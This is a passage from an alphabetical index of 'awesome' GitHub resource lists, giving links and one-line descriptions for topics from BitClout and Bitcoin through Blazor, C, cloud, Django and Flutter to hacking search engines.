[awesome-bitclout](https://github.com/davidshq/awesome-bitclout) – [BitClout](https://bitclout.com/) blockchain social network. * [awesome-bitcoin](https://github.com/igorbarinov/awesome-bitcoin) – Bitcoin services and tools for software developers. * [awesome-bitcoin-payment-processors](https://github.com/alexk111/awesome-bitcoin-payment-processors) – Bitcoin payment processors and stories from merchants using them. * [Awesome-Black-Friday-Cyber-Monday](https://github.com/trungdq88/Awesome-Black-Friday-Cyber-Monday) – Deals on Black Friday: Apps, SaaS, Books, Courses, etc. (2022) * [awesome-blazor](https://github.com/AdrienTorris/awesome-blazor) – [Blazor](https://blazor.net/), a .NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. * [awesome-blender](https://github.com/agmmnn/awesome-blender) – [Blender](https://www.blender.org/) add-ons, tools, tutorials and 3D resources. * [awesome-blockchain](https://github.com/0xtokens/awesome-blockchain) by @0xtokens – Blockchain and Crytocurrency Resources * [awesome-blockchain](https://github.com/coderplex-org/awesome-blockchain) by @coderplex-org – Blockchain, Bitcoin and Ethereum related resources * [awesome-blockchain](https://github.com/cyberFund/awesome-blockchain) _In Russian_ by @cyberFund – Digest of knowledge about crypto networks (including cryptocurrencies). * [awesome-blockchain](https://github.com/hitripod/awesome-blockchain) by @hitripod * [awesome-blockchain](https://github.com/igorbarinov/awesome-blockchain) by @igorbarinov – The bitcoin blockchain services * [awesome-blockchain](https://github.com/imbaniac/awesome-blockchain) by @imbaniac – Blockchain services and exchanges * [awesome-blockchain](https://github.com/iNiKe/awesome-blockchain) by @iNiKe – Blockchain, ICO, ₿itcoin, Cryptocurrencies * [awesome-blockchain](https://github.com/oiwn/awesome-blockchain) by @oiwn – Projects and services based on blockchain technology * [awesome-blockchain-ai](https://github.com/steven2358/awesome-blockchain-ai) – Blockchain projects for Artificial Intelligence and Machine Learning * [awesome-blockchains](https://github.com/openblockchains/awesome-blockchains) – Blockchains - open distributed databases w/ crypto hashes incl. git * [awesome-blockstack](https://github.com/jackzampolin/awesome-blockstack) – [Blockstack](https://blockstack.org/) decentralized computing platform * [awesome-book-authoring](https://github.com/TalAter/awesome-book-authoring) – Resources for technical book authors * [awesome-bootstrap](https://github.com/therebelrobot/awesome-bootstrap) – Free Bootstrap themes I think are cool. * [awesome-bpm](https://github.com/ungerts/awesome-bpm) – Business Process Management (BPM) awesomeness. * [awesome-broadcasting](https://github.com/ebu/awesome-broadcasting) – Open source resources related to broadcast technologies - http://ebu.io/opensource * [awesome-browser-extensions-for-github](https://github.com/stefanbuck/awesome-browser-extensions-for-github) – Browser extensions for GitHub. * [awesome-browserify](https://github.com/browserify/awesome-browserify) – [Browserify](http://browserify.org/) bundler * [awesome-btcdev](https://github.com/btcbrdev/awesome-btcdev) – Bitcoin development * [awesome-bugs](https://github.com/criswell/awesome-bugs) – Funny and interesting bugs * [awesome-building-blocks-for-web-apps](https://github.com/componently-com/awesome-building-blocks-for-web-apps) – Standalone features (services, components, libraries) to be integrated into web applications. - https://www.componently.com/ * [awesome-c](https://github.com/aleksandar-todorovic/awesome-c) by @aleksandar-todorovic – Continuing the development of awesome-c on GitHub * [awesome-c](https://github.com/kozross/awesome-c) by @kozross – C frameworks, libraries, resources etc. - [mirror](https://notabug.org/koz.ross/awesome-c) * [awesome-cakephp](https://github.com/FriendsOfCake/awesome-cakephp) – [CakePHP](https://cakephp.org/) web framework * [awesome-calculators](https://github.com/xxczaki/awesome-calculators) * [awesome-canvas](https://github.com/raphamorim/awesome-canvas) – HTML5 Canvas * [awesome-captcha](https://github.com/ZYSzys/awesome-captcha) – Captcha libraries and crack tools. - http://zyszys.github.io/awesome-captcha/ * [awesome-cassandra](https://github.com/yikebocai/awesome-cassandra) * [awesome-ccxt](https://github.com/suenot/awesome-ccxt) – [CryptoCurrency eXchange Trading Library](https://github.com/ccxt/ccxt) * [awesome-celery](https://github.com/svfat/awesome-celery) – [Celery](https://docs.celeryq.dev/) task queue. * [awesome_challenge_list](https://github.com/AwesomeRubyist/awesome_challenge_list) – Sites with challenges to improve your programming skills. * [awesome-challenges](https://github.com/mauriciovieira/awesome-challenges) – Algorithmic challenges * [awesome-charting](https://github.com/zingchart/awesome-charting) – Charts and dataviz. * [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts) – [ChatGPT](https://chat.openai.com/) prompt examples. * [awesome-chatops](https://github.com/exAspArk/awesome-chatops) – ChatOps – managing operations through a chat * [awesome-chef](https://github.com/obazoud/awesome-chef) – Cookbooks, handlers, add-ons and other resources for Chef, a configuration management tool. * [awesome-cheminformatics](https://github.com/hsiaoyi0504/awesome-cheminformatics) – Chemical informatics * [awesome-chess](https://github.com/hkirat/awesome-chess) – Chess software, libraries, and resources * [awesome-choo](https://github.com/choojs/awesome-choo) – [choo](https://choo.io/) web framework * [awesome-chrome-devtools](https://github.com/ChromeDevTools/awesome-chrome-devtools) – Chrome DevTools ecosystem tooling and resources. * [awesome-ci](https://github.com/ligurio/awesome-ci) by @ligurio – Comparison of cloud based CI services. * [awesome-ci](https://github.com/pditommaso/awesome-ci) by @pditommaso – Continuous integation services. * [awesome-ciandcd](https://github.com/cicdops/awesome-ciandcd) – Continuous Integration and Continuous Delivery - http://www.ciandcd.com/ * [awesome-circuitpython](https://github.com/adafruit/awesome-circuitpython) – [CircuitPython](https://circuitpython.org/) microcontrollers programming language * [awesome-cl](https://github.com/CodyReichert/awesome-cl) – Common Lisp * [awesome-cl-software](https://github.com/azzamsa/awesome-cl-software) – Applications built with Common Lisp * [awesome-cli-apps](https://github.com/agarrharr/awesome-cli-apps) – Command line apps * [awesome-clojure](https://github.com/mbuczko/awesome-clojure) by @mbuczko – Useful links for clojurians * [awesome-clojure](https://github.com/razum2um/awesome-clojure) by @razum2um * [awesome-clojurescript](https://github.com/hantuzun/awesome-clojurescript) * [awesome-cloud](https://github.com/JStumpp/awesome-cloud) – Delightful cloud services. * [awesome-cloud-certifications](https://gitlab.com/edzob/awesome-cloud-certifications) – Certifications for cloud platforms * [awesome-cloud-cost-control](https://github.com/Funkmyster/awesome-cloud-cost-control) – Ways to control the cost of cloud environments. * [awesome-cloudflare](https://github.com/irazasyed/awesome-cloudflare) – [Cloudflare](https://www.cloudflare.com/) tools and recipes. * [awesome-cloudflare-workers](https://github.com/lukeed/awesome-cloudflare-workers) – [Cloudflare Workers](https://workers.cloudflare.com/) serverless / Functions as a Service platform. * [awesome-cmake](https://github.com/onqtam/awesome-cmake) – CMake * [awesome-cms](https://github.com/postlight/awesome-cms) – Open and closed source Content Management Systems (CMS) * [Awesome-CobaltStrike-Defence](https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence) – Defences against [Cobalt Strike](https://www.cobaltstrike.com/), Adversary Simulations and Red Team Operations software. * [awesome-cobol](https://github.com/mickaelandrieu/awesome-cobol) – COBOL programming language * [awesome-cocoa](https://github.com/v-braun/awesome-cocoa) – Cocoa controls for iOS, watchOS and macOS - http://cocoa.rocks * [awesome-code-formatters](https://github.com/rishirdua/awesome-code-formatters) * [awesome-code-review](https://github.com/joho/awesome-code-review) * [awesome-codepoints](https://github.com/Codepoints/awesome-codepoints) – Interesting Unicode characters * [awesome-coins](https://github.com/Zheaoli/awesome-coins) – Guide to cryto-currencies and their algos. * [awesome-cold-showers](https://github.com/hwayne/awesome-cold-showers) – For when people get too hyped up about things. * [awesome-coldfusion](https://github.com/seancoyne/awesome-coldfusion) * [awesome-common-lisp-learning](https://github.com/GustavBertram/awesome-common-lisp-learning) * [awesome-community](https://github.com/phpearth/awesome-community) – development, support and discussion channels, groups and communities. * [awesome-community-building](https://github.com/CrowdDevHQ/awesome-community-building) – Building developer communities. * [awesome-community-detection](https://github.com/benedekrozemberczki/awesome-community-detection) – Community detection papers with implementations. * [awesome-comparisons](https://github.com/dhamaniasad/awesome-comparisons) – Framework and code comparison projects, like TodoMVC and Notejam. * [awesome-competitive-programming](https://github.com/lnishan/awesome-competitive-programming) – Competitive Programming, Algorithm and Data Structure resources - http://codeforces.com/blog/entry/23054 * [awesome-composer](https://github.com/jakoch/awesome-composer) – Composer, Packagist, Satis PHP ecosystem * [awesome-computational-neuroscience](https://github.com/eselkin/awesome-computational-neuroscience) – Schools and researchers in computational neuroscience * [awesome-computer-history](https://github.com/watson/awesome-computer-history) – Computer history videos, documentaries and related folklore. * [awesome-computer-vision](https://github.com/AGV-IIT-KGP/awesome-computer-vision) by @AGV-IIT-KGP * [awesome-computer-vision](https://github.com/jbhuang0604/awesome-computer-vision) by @jbhuang0604 * [awesome-computer-vision-models](https://github.com/nerox8664/awesome-computer-vision-models) – Popular deep learning models related to classification and segmentation task * [awesome-conference-playlists](https://github.com/chentsulin/awesome-conference-playlists) – Video playlists for conferences. * [awesome-conferences](https://github.com/RichardLitt/awesome-conferences) * [awesome-connectivity-info](https://github.com/stevesong/awesome-connectivity-info) – Connectivity indexes and reports to help you better under who has access to communication infrastructure and on what terms. * [awesome-conservation-tech](https://github.com/anselmbradford/awesome-conservation-tech) – Intersection of tech and environmental conservation. * [awesome-console-services](https://github.com/chubin/awesome-console-services) – Console services (reachable via HTTP, HTTPS and other network protocols). * [awesome-construct](https://github.com/WebCreationClub/awesome-construct) – [Construct](https://www.construct.net/) game development toolkit * [awesome-container](https://github.com/tcnksm/awesome-container) – Container technologies and services. * [awesome-conversational](https://github.com/mortenjust/awesome-conversational) – Conversational UI * [awesome-cordova](https://github.com/busterc/awesome-cordova) _Apache Cordova / PhoneGap_ * [Awesome-CoreML-Models](https://github.com/likedan/Awesome-CoreML-Models) – Models for Core ML (for iOS 11+) * [awesome-coronavirus](https://github.com/soroushchehresa/awesome-coronavirus) – Projects and resources related to SARS-CoV-2 and COVID-19. * [awesome-cosmopolitan](https://github.com/shmup/awesome-cosmopolitan) – [Cosmopilitan libc](https://justine.lol/cosmopolitan/), makes C a build-once run-anywhere language. * [awesome-couchdb](https://github.com/quangv/awesome-couchdb) – CouchDB resource list. * [awesome-courses](https://github.com/fffaraz/awesome-courses) by @fffaraz – Online programming/CS courses. * [awesome-courses](https://github.com/prakhar1989/awesome-courses) by @prakhar1989 – University Computer Science courses across the web. * [awesome-cpp](https://github.com/fffaraz/awesome-cpp) – C/C++ * [awesome-crdt](https://github.com/alangibson/awesome-crdt) – Conflict-free replicated data types * [awesome-creative-coding](https://github.com/terkelg/awesome-creative-coding) – Creative Coding: Generative Art, Data visualization, Interaction Design * [awesome-critical-tech-reading-list](https://github.com/chobeat/awesome-critical-tech-reading-list) – Reading list for the modern critical programmer. * [Awesome-Cross-Platform-Apps](https://github.com/Juude/Awesome-Cross-Platform-Apps) – Solutions for building cross-platform apps. * [awesome-cross-platform-nodejs](https://github.com/bcoe/awesome-cross-platform-nodejs) – Tools for writing cross-platform Node.js code. * [awesome-crypto-papers](https://github.com/pFarb/awesome-crypto-papers) – Cryptography papers, articles, tutorials and howtos. * [awesome-crypto-trackers](https://github.com/denisnazarov/awesome-crypto-trackers) – Crypto project trackers and analytics dashboards. * [awesome-cryptocurrencies](https://github.com/kasketis/awesome-cryptocurrencies) * [awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) – Cryptography and encryption resources. * [awesome-crystal](https://github.com/veelenga/awesome-crystal) – Crystal Language * [awesome-css](https://github.com/awesome-css-group/awesome-css) by @awesome-css-group * [awesome-css](https://github.com/bring2dip/awesome-css) by @deepakbhattarai * [awesome-css-frameworks](https://github.com/troxler/awesome-css-frameworks) – CSS frameworks * [awesome-css-learning](https://github.com/micromata/awesome-css-learning) – A tiny list limited to the best CSS Learning Resources * [awesome-css-only](https://github.com/refusado/awesome-css-only) – Beautiful projects made with pure CSS. * [awesomeCSV](https://github.com/secretGeek/awesomeCSV) – CSV, Comma Separated Values format * [awesome-ctf](https://github.com/apsdehal/awesome-ctf) – [Capture the Flag](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security) - https://apsdehal.in/awesome-ctf/ * [awesome-cto](https://github.com/kuchin/awesome-cto) – Resources for Chief Technology Officers, with the emphasis on startups * [awesome-cto-resources](https://github.com/mateusz-brainhub/awesome-cto-resources) – Grow as a Chief Technology Officer. * [awesome-cybersecurity-blueteam](https://github.com/fabacab/awesome-cybersecurity-blueteam) – [Cybersecurity blue teams](https://en.wikipedia.org/wiki/Blue_team_(computer_security)) resources * [awesome-cyclejs](https://github.com/cyclejs-community/awesome-cyclejs) – Cycle.js framework * [awesome-d](https://github.com/zhaopuming/awesome-d) – D programming language. * [awesome-d3](https://github.com/wbkd/awesome-d3) – [D3js](http://d3js.org/) libraries, plugins and utilities. * [awesome-dart](https://github.com/yissachar/awesome-dart) * [awesome-dash](https://github.com/ucg8j/awesome-dash) – [Dash (plotly)](https://plot.ly/dash/) framework for analytical web applications * [awesome-dashboard](https://github.com/obazoud/awesome-dashboard) – Dashboards/visualization resources. * [awesome-data-engineering](https://github.com/igorbarinov/awesome-data-engineering) – Data engineering tools for software developers. * [awesome-datascience](https://github.com/academic/awesome-datascience) – An open source DataScience repository to learn and apply for real world problems. * [awesome-datasets](https://github.com/viisar/awesome-datasets) – Datasets for papers/experiments/validation. * [awesome-dataviz](https://github.com/fasouto/awesome-dataviz) – Data visualizations frameworks, libraries and software. * [awesome-db](https://github.com/numetriclabz/awesome-db) – Database libraries and resources. * [awesome-db-tools](https://github.com/mgramin/awesome-db-tools) – Everything that makes working with databases easier. * [awesome-ddd](https://github.com/heynickc/awesome-ddd) by @heynickc – Domain-Driven Design (DDD), Command Query Responsibility Segregation (CQRS), Event Sourcing, and Event Storming * [awesome-ddd](https://github.com/wkjagt/awesome-ddd) by @wkjagt – Domain-Driven Design * [awesome-decentralized-llm](https://github.com/imaurer/awesome-decentralized-llm) – Large Language Models (LLM) for building products you can "own" or to perform reproducible research. * [awesome-decentralized-web](https://github.com/gdamdam/awesome-decentralized-web) – Decentralized services and technologies * [awesome-decision-tree-papers](https://github.com/benedekrozemberczki/awesome-decision-tree-papers) – Decision Tree Research Papers * [awesome-deep-learning](https://github.com/ChristosChristofidis/awesome-deep-learning) – Deep Learning tutorials, projects and communities. * [awesome-deep-learning-and-machine-learning-questions](https://github.com/bat67/awesome-deep-learning-and-machine-learning-questions) _In Chinese_ – 收集整理的一些网站中(如知乎、Quora、Reddit、Stack Exchange等)与深度学习、机器学习、强化学习、数据科学相关的有价值的问题 * [awesome-deep-learning-papers](https://github.com/terryum/awesome-deep-learning-papers) – The most cited deep learning papers * [awesome-deep-learning-resources](https://github.com/guillaume-chevalier/awesome-deep-learning-resources) – Rough list of resources about deep learning. * [awesome-deep-rl](https://github.com/tigerneil/awesome-deep-rl) – Deep Reinforcement Learning * [awesome-deep-vision](https://github.com/kjw0612/awesome-deep-vision) – Computer vision / deep learning. * [awesome-deku](https://github.com/lambtron/awesome-deku) – Resources for the Deku library. * [awesome-delphi](https://github.com/Fr0sT-Brutal/awesome-delphi) * [awesome-deno](https://github.com/denolib/awesome-deno) – [Deno](https://deno.land/), a secure runtime for JavaScript and TypeScript. * [awesome-derby](https://github.com/russll/awesome-derby) – Components for DerbyJS. * [awesome-design](https://github.com/troyericg/awesome-design) – Resources for digital designers. * [awesome-design-patterns](https://github.com/DovAmir/awesome-design-patterns) – Resources on software design patterns. * [awesome-design-principles](https://github.com/robinstickel/awesome-design-principles) * [awesome-design-systems](https://github.com/alexpate/awesome-design-systems) * [Awesome-Design-Tools](https://github.com/goabstract/Awesome-Design-Tools) - https://flawlessapp.io/designtools * [awesome-desktop-js](https://github.com/styfle/awesome-desktop-js) – Implementing desktop apps with JavaScript * [awesome-dev-discord](https://github.com/ljosberinn/awesome-dev-discord) – Official, development-related Discord servers. - https://dev-discords.now.sh/ * [awesome-dev-fun](https://github.com/mislavcimpersak/awesome-dev-fun) – Fun libs/packages/languages that have no real purpose but to make a developer chuckle. * [awesome-developer-blogs](https://github.com/endymion1818/awesome-developer-blogs) * [awesome-developer-experience](https://github.com/prokopsimek/awesome-developer-experience) by @prokopsimek * [awesome-developer-experience](https://github.com/workos/awesome-developer-experience) by @workos * [awesome-developer-first](https://github.com/agamm/awesome-developer-first) – Developer-first products. * [awesome-developer-first-directories](https://github.com/fmerian/awesome-developer-first-directories) – places to promote your developer-first product. * [awesome-developer-marketing](https://github.com/ronakganatra/awesome-developer-marketing) * [awesome-devenv](https://github.com/jondot/awesome-devenv) – Tools, resources and workflow tips making an awesome development environment. * [awesome-devops](https://github.com/joubertredrat/awesome-devops) * [awesome-devrel](https://github.com/devrelcollective/awesome-devrel) – Developer Relations * [awesome-devtools](https://github.com/moimikey/awesome-devtools) – In-browser bookmarklets, tools, and resources for front-end devs. * [awesome-digital-nomads](https://github.com/cbovis/awesome-digital-nomads) – Resources for Digital Nomads. * [awesome-digitalocean](https://github.com/jonleibowitz/awesome-digitalocean) – DigitalOcean cloud infrastructure provider * [awesome-discord](https://github.com/alfg/awesome-discord) by @alfg * [awesome-discord](https://github.com/jacc/awesome-discord) by @jacc – Discord chat and VoIP application. * [awesome-discord-communities](https://github.com/mhxion/awesome-discord-communities) – Discord communities for programmers. * [awesome-diversity](https://github.com/folkswhocode/awesome-diversity) – Diversity in technology. * [awesome-django](https://github.com/wsvincent/awesome-django) – [Django](https://www.djangoproject.com/) Python web framework * [awesome-django-cms](https://github.com/mishbahr/awesome-django-cms) – django CMS add-ons. * [awesome-docker](https://github.com/veggiemonk/awesome-docker) by @veggiemonk * [awesome-docsify](https://github.com/docsifyjs/awesome-docsify) – [docsify](https://docsify.js.org/) documentation site generator. * [awesome-doctrine](https://github.com/biberlabs/awesome-doctrine) – Doctrine ORM libraries and resources. * [awesome-document-understanding](https://github.com/tstanislawek/awesome-document-understanding) – Automated data extraction from documents. * [awesome-dojo](https://github.com/petk/awesome-dojo) – Dojo JavaScript Toolkit resources and libraries. * [awesome-dot-dev](https://github.com/orbit-love/awesome-dot-dev) – Developer resources on the .dev TLD. * [awesome-dotfiles](https://github.com/webpro/awesome-dotfiles) * [awesome-dotnet](https://github.com/quozd/awesome-dotnet) – .NET libraries, tools, frameworks and software. * [awesome-dotnet-architecture](https://github.com/mehdihadeli/awesome-dotnet-architecture) – Software architecture, patterns, and principles in .NET platform. * [awesome-dotnet-core](https://github.com/thangchung/awesome-dotnet-core) – .NET core libraries, tools, frameworks and software * [awesome-dotnet-core-education](https://github.com/mehdihadeli/awesome-dotnet-core-education) – .NET Core education resources. * [awesome-dotnet-tips](https://github.com/meysamhadeli/awesome-dotnet-tips) – .NET, software architecture, microservice and cloud-native. * [awesome-draft-js](https://github.com/nikgraf/awesome-draft-js) – [Draft.js](https://draftjs.org/) text editor framework * [awesome-dropwizard](https://github.com/stve/awesome-dropwizard) – [Dropwizard](https://www.dropwizard.io/) Java web framework * [awesome-drupal](https://github.com/emincansumer/awesome-drupal) by @emincansumer * [awesome-drupal](https://github.com/mrsinguyen/awesome-drupal) by @mrsinguyen * [awesome-drupal](https://github.com/nirgn975/awesome-drupal) by @nirgn975 – Useful resources for Drupal CMS :droplet: * [awesome-dtrace](https://github.com/xen0l/awesome-dtrace) – DTrace books, articles, videos, tools and resources. - https://awesome-dtrace.com * [awesome-ebpf](https://github.com/zoidbergwill/awesome-ebpf) – eBPF Linux packet filter * [awesome-economics](https://github.com/antontarasenko/awesome-economics) – Economics related projects, software, people * [awesome-ecs](https://github.com/nathanpeck/awesome-ecs) – AWS Elastic Container Service and Fargate. * [awesome-edge-computing](https://github.com/qijianpeng/awesome-edge-computing) – Edge computing, including Frameworks, Simulators, Tools, etc. * [awesome-editorjs](https://github.com/editor-js/awesome-editorjs) – [Editor.js](https://editorjs.io/) block-styled editor component. * [awesome-edtech-tools](https://github.com/hkalant/awesome-edtech-tools) – Tools and resources for educators and virtual teachers. * [awesome-educate](https://github.com/mercer/awesome-educate) – Education resources online. * [awesome-educational-games](https://github.com/yrgo/awesome-educational-games) – Educational games to learn editors, languages, programming * [awesome-ejabberd](https://github.com/shantanu-deshmukh/awesome-ejabberd) – All awesome stuff of the ejabberd ecosystem. - https://ejabberd.shantanudeshmukh.com * [awesome-electron](https://github.com/sindresorhus/awesome-electron) – Resources for creating apps with [Electron](http://electron.atom.io/) (formerly atom-shell). * [awesome-electronics](https://github.com/kitspace/awesome-electronics) – Electronic engineering * [awesome-eleventy](https://github.com/chrissy-dev/awesome-eleventy) – [Eleventy (11ty)](https://www.11ty.dev/) static site generator. * [awesome-elixir](https://github.com/h4cc/awesome-elixir) * [awesome-elm](https://github.com/sporto/awesome-elm) – [Elm](https://elm-lang.org/), a functional reactive language * [awesome-emacs](https://github.com/emacs-tw/awesome-emacs) by @emacs-tw * [awesome-emacs](https://github.com/sefakilic/awesome-emacs) by @sefakilic * [awesome-emacs](https://github.com/tacticiankerala/awesome-emacs) by @tacticiankerala * [awesome-emails](https://github.com/jonathandion/awesome-emails) – Build better emails. * [awesome-embedded-rust](https://github.com/rust-embedded/awesome-embedded-rust) – Embedded and Low-level development in the Rust programming language * [awesome-embedded-security](https://github.com/hexsecs/awesome-embedded-security) * [awesome-ember](https://github.com/ember-community-russia/awesome-ember) by @ember-community-russia – [Ember.js](https://emberjs.com/) JavaScript framework * [awesome-ember](https://github.com/nmec/awesome-ember) by @nmec – Ember.js things. * [awesome-endless-codeforall-list](https://github.com/RobTranquillo/awesome-endless-codeforall-list) – Every tool that civic hackers worldwide use to work. * [awesome-engineer-onboarding](https://github.com/posquit0/awesome-engineer-onboarding) * [awesome-engineering-ladders](https://github.com/posquit0/awesome-engineering-ladders) * [awesome-Engineering-Team-Management](https://github.com/kdeldycke/awesome-engineering-team-management) – How to transition from software development to engineering management. * [awesome-engineering-team-principles](https://github.com/posquit0/awesome-engineering-team-principles) * [awesome-eosio](https://github.com/DanailMinchev/awesome-eosio) – [EOS.IO](https://eos.io/) blockchain protocol * [awesome-erlang](https://github.com/drobakowski/awesome-erlang) * [awesome-eslint](https://github.com/dustinspecker/awesome-eslint) – [ESLint](https://eslint.org/) JavaScript linter * [awesome-esolangs](https://github.com/angrykoala/awesome-esolangs) – Esoteric languages * [awesome-eta](https://github.com/sfischer13/awesome-eta) – [Eta](https://eta-lang.org/) programming language * [awesome-ethereum](https://github.com/bekatom/awesome-ethereum) by @bekatom – [Ethereum](https://ethereum.org/) decentralized software platform & Dapps. * [Awesome-Ethereum](https://github.com/ttumiel/Awesome-Ethereum) by @ttumiel * [awesome-ethereum](https://github.com/vinsgo/awesome-ethereum) by @vinsgo - http://awesome-ethereum.com/ * [awesome-ethereum-virtual-machine](https://github.com/pirapira/awesome-ethereum-virtual-machine) * [awesome-falsehood](https://github.com/kdeldycke/awesome-falsehood) – Falsehoods programmers believe in. * [awesome-fantasy](https://github.com/r7kamura/awesome-fantasy) – FinalFantasy-ish metaphors in software. * [awesome-fast-check](https://github.com/dubzzz/awesome-fast-check) – [fast-check](https://github.com/dubzzz/fast-check/) property based testing framework for JavaScript/TypeScript * [awesome-fastapi](https://github.com/mjhea0/awesome-fastapi) – [FastAPI](https://fastapi.tiangolo.com/) Python web framework * [awesome-feathersjs](https://github.com/feathersjs/awesome-feathersjs) – [Feathers](https://feathersjs.com/) Node.js framework for real-time applications REST APIs. * [Awesome-Federated-Machine-Learning](https://github.com/innovation-cat/Awesome-Federated-Machine-Learning) – Federated Learning (FL) is a new machine learning framework, which enables multiple devices collaboratively to train a shared model without compromising data privacy and security. * [awesome-fediverse](https://github.com/emilebosch/awesome-fediverse) – [Fediverse](https://en.wikipedia.org/wiki/Fediverse) resources. * [awesome-ffmpeg](https://github.com/transitive-bullshit/awesome-ffmpeg) – FFmpeg resources. * [awesome-finger](https://github.com/reiver/awesome-finger) – Finger protocol ecosystem. * [awesome-firebase](https://github.com/jthegedus/awesome-firebase) – Firebase mobile development platform * [awesome.fish](https://github.com/jorgebucaran/awesome.fish) – Fish shell - https://git.io/awesome-fish * [awesome-flask](https://github.com/humiaozuzu/awesome-flask) – Flask Python web framework resources and plugins. * [awesome-flexbox](https://github.com/afonsopacifer/awesome-flexbox) – CSS Flexible Box Layout Module. * [awesome-fluidapp](https://github.com/lborgav/awesome-fluidapp) – Icons, Userstyles and Userscripts for Fluid Apps * [awesome-flutter](https://github.com/Solido/awesome-flutter) – An awesome list that curates the best Flutter libraries, tools, tutorials, articles and more. * [awesome-fonts](https://github.com/brabadu/awesome-fonts) – Fonts and everything * [awesome-food](https://github.com/jzarca01/awesome-food) – Food related software projects * [awesome-for-beginners](https://github.com/MunGell/awesome-for-beginners) – Beginner-friendly projects to start contributing. * [awesome-fortran](https://github.com/rabbiabram/awesome-fortran) * [awesome-foss-apps](https://github.com/DataDaoDe/awesome-foss-apps) – Production grade free and open source software * [awesome-fp-js](https://github.com/stoeffel/awesome-fp-js) – Functional programming stuff in JavaScript. * [awesome-framer](https://github.com/podo/awesome-framer) – Framer prototyping tool * [awesome-fraud-detection-papers](https://github.com/benedekrozemberczki/awesome-fraud-detection-papers) – Fraud detection research papers. * [awesome-frc](https://github.com/andrewda/awesome-frc) – First Robotics Competition * [awesome-free-software](https://github.com/johnjago/awesome-free-software) – Free as in freedom software * [awesome-frege](https://github.com/sfischer13/awesome-frege) – [Frege](https://github.com/Frege/frege) programming language * [awesome-fsharp](https://github.com/fsprojects/awesome-fsharp) – F# programming language * [awesome-fsm](https://github.com/leonardomso/awesome-fsm) by @leonardomso – Finite State Machines and Statecharts * [awesome-fsm](https://github.com/soixantecircuits/awesome-fsm) by @soixantecircuits – Finite State Machines * [awesome-functional-programming](https://github.com/lucasviola/awesome-functional-programming) by @lucasviola * [awesome-functional-programming](https://github.com/xgrommx/awesome-functional-programming) by @xgrommx * [awesome-funny-markov](https://github.com/sublimino/awesome-funny-markov) – Delightfully amusing and facetious Markov chain output. * [awesome-fuse](https://github.com/fuse-compound/awesome-fuse) – [Fuse](https://fuseopen.com/) mobile development framework * [awesome-fuzzing](https://github.com/cpuu/awesome-fuzzing) – Fuzzing (or Fuzz Testing) for software security * [awesome-gametalks](https://github.com/hzoo/awesome-gametalks) – Gaming talks (development, design, etc) * [awesome-gbdev](https://github.com/gbdev/awesome-gbdev) – Game Boy development resources such as tools, docs, emulators, related projects and open-source ROMs - https://gbdev.github.io/list * [awesome-geek-podcasts](https://github.com/ayr-ton/awesome-geek-podcasts) – Podcasts we like to listen to. - http://ayr-ton.github.io/awesome-geek-podcasts * [awesome-gemini](https://github.com/kr1sp1n/awesome-gemini) – [Gemini protocol](https://gemini.circumlunar.space/) * [awesome-geojson](https://github.com/tmcw/awesome-geojson) – GeoJSON * [awesome-ggplot2](https://github.com/erikgahner/awesome-ggplot2) – [ggplot2](https://ggplot2.tidyverse.org/) data visualization for R. * [awesome-gideros](https://github.com/stetso/awesome-gideros) – [Gideros](http://giderosmobile.com/) game development framework * [awesome-gif](https://github.com/davisonio/awesome-gif) – GIF software resources - https://davison.io/awesome-gif * [awesome-gists](https://github.com/vsouza/awesome-gists) – Amazing gists * [awesome-git](https://github.com/dictcp/awesome-git) – Git tools, resources and shiny things. * [awesome-git-addons](https://github.com/stevemao/awesome-git-addons) – Add-ons that extend/enhance the git CLI. * [awesome-git-hooks](https://github.com/CompSciLauren/awesome-git-hooks) – Easy-to-use git hooks for automating tasks during git workflows. * [awesome-github](https://github.com/AntBranch/awesome-github) _In Chinese_ by @AntBranch – GitHub guides, articles, sites, tools, projects and resources. 收集这个列表,只是为了更好地使用亲爱的GitHub,欢迎提交pr和issue。 - https://github.com/AntBranch/awesome-github * [awesome-github](https://github.com/fffaraz/awesome-github) by @fffaraz – Git and GitHub references. * [awesome-github](https://github.com/Kikobeats/awesome-github) by @Kikobeats – GitHub secrets and goodies. * [awesome-github](https://github.com/phillipadsmith/awesome-github) by @phillipadsmith – GitHub's awesomeness * [awesome-github-repo](https://github.com/flyhigher139/awesome-github-repo) – GitHub repositories; various topics like study materials, Raspberry Pi etc. * [awesome-gnome](https://github.com/Kazhnuz/awesome-gnome) – Gnome Desktop Environment. * [awesome-go](https://github.com/avelino/awesome-go) by @avelino – Golang - http://awesome-go.com/ * [awesome-go-books](https://github.com/heatroom/awesome-go-books) – Online and free golang books. * [awesome-go-education](https://github.com/mehdihadeli/awesome-go-education) – Learning and practicing Golang and its related technologies. - https://mehdihadeli.github.io/awesome-go-education/ * [awesome-godot](https://github.com/godotengine/awesome-godot) – [Godot](https://godotengine.org/) game engine * [awesome-gpt4](https://github.com/taranjeet/awesome-gpt4) – OpenAI GPT-4. * [awesome-gradient-boosting-papers](https://github.com/benedekrozemberczki/awesome-gradient-boosting-papers) – Gradient boosting research papers with implementations. * [awesome-grails](https://github.com/hitenpratap/awesome-grails) * [awesome-graph-classification](https://github.com/benedekrozemberczki/awesome-graph-classification) – Graph embedding papers with implementations. * [awesome-graphql](https://github.com/chentsulin/awesome-graphql) – GraphQL & Relay Resources. * [awesome-graphql-java](https://github.com/graphql-java/awesome-graphql-java) – Projects related to [graphql-java](https://www.graphql-java.com/). * [awesome-groovy](https://github.com/kdabir/awesome-groovy) * [awesome-growth-hacking](https://github.com/bekatom/awesome-growth-hacking) * [awesome-grpc](https://github.com/grpc-ecosystem/awesome-grpc) – [gRPC](https://grpc.io/) RPC framework. * [awesome-guidelines](https://github.com/Kristories/awesome-guidelines) – Coding style conventions and standards. - https://awesome-guidelines.com * [awesome-gulp](https://github.com/alferov/awesome-gulp) – [Gulp](http://gulpjs.com/) build system resources and plugins. * [awesome-gyazo](https://github.com/gyazo/awesome-gyazo) – Tools for [Gyazo](https://gyazo.com/) screen capture application. * [awesome-h2o](https://github.com/h2oai/awesome-h2o) – H2O Machine Learning * [awesome-hacker-search-engines](https://github.com/edoardottt/awesome-hacker-search-engines) – Search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty. * [awesome-hacking](https://github.com/carpedm20/awesome-hacking) * 